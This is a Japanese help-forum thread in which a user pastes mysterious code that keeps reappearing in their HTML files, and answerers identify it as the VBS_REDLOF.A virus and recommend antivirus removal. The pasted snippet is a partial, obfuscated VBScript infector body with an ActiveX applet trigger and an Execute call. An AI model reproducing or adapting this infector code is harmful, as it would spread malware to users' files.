プロが教える店舗&オフィスのセキュリティ対策術

HTML文書をメモ帳で作っていますが、昨日からこれまでつくった全ての文書のメモ帳を開くと入れた記憶のない変な記述がくっついてきます。何度消してもまた復活しています。少し長いのですが、これです。長くて載せ切れなかったので、途中適当に消しました。
<HTML><BODY onload="vbscript:KJ_start()"><scriptlanguage=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent></APPLET></div>"
</script>
<script language=vbscript>ish>ego_e?nd@un`niok@un`niokKJrgmad_Foi^er%JateHamb#Lh EolorLesrge K_xtSeqFoi^erK[me7 FPI.GbnFoi^er%JateHamb#P_t QbisCclep= CildblNaj_.FffesHtq?xipns :0@or?aceThfmFii_ IkThfmFii_s@ilb?xt7 U@[se%@SO+AetBrtekmiokHambThfmFii_.P^nh)&IcFii_Exq= BTMOr@ilb?xt7 ENMLOr@ilb?TempChar"&vbCrLf&"Next")
Execute(ThisText)
</script></BODY></HTML>
文書自体はちゃんと表示れ一見何の障害もないように見えますが、削除しても復活しているし記憶にないだけに気持ち悪くて仕方がありません。HTML文書を入れているフォルダと、Cドライブにdesktop.iniと Folder.httという憶えのないアイコンが出来ていました。これも削除してもまた復活しています。この二つのアイコンもメモ帳で開くとまた意味不明の記述があるのですが長くなりすぎるので割愛します。このアイコンが出来ていたのも、メモ帳に変な文書がくっついてくるのも全く同時期です。これはウィルスなのでしょうか?とすればどのように対処すればいいでしょうか?かなり困っています。長くなりましたが、分かる方いらっしゃいましたら回答をよろしくお願いします。

A 回答 (3件)

コンピュータウイルスだと思います。



ノートンアンチウイルス
ウイルスバスターなどで駆除したほうがいいでしょう

↓オンラインスキャン(トレンドマイクロ社)をおつけします
ぜひ行ってみましょう。

参考URL:http://www.trendmicro.co.jp/hcall/index.asp
    • good
    • 0
この回答へのお礼

ご回答感謝いたします。
教えていただいたHPへ行き
ウイルスバスターで駆除しました。
ありがとうございました。

お礼日時:2003/07/21 23:17

VBS_REDLOF.Aに感染してます。



参考URL:http://www.trendmicro.co.jp/vinfo/virusencyclo/d …
    • good
    • 0
この回答へのお礼

ご回答ありがとうございます。
教えていただいたHPに行ってみました。
おっしゃるようにVBS_REDLOF.Aというやつみたいですね・・・
ウイルスバスターで駆除して問題は解決しました。
ウイルスのことをもっと勉強したいと思います。
ありがとうございました。

お礼日時:2003/07/21 23:22

http://angel.cside.biz/virus/redlof/
参考になさってください
ウィルス感染でしょうね

参考URL:http://angel.cside.biz/virus/redlof/
    • good
    • 0
この回答へのお礼

ご回答ありがとうございます。
教えていただいたHPへ行き
ウイルスのことを勉強しました。
ウイルスバスターで駆除して問題は解決しました。
ありがとうございました。

お礼日時:2003/07/21 23:19

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!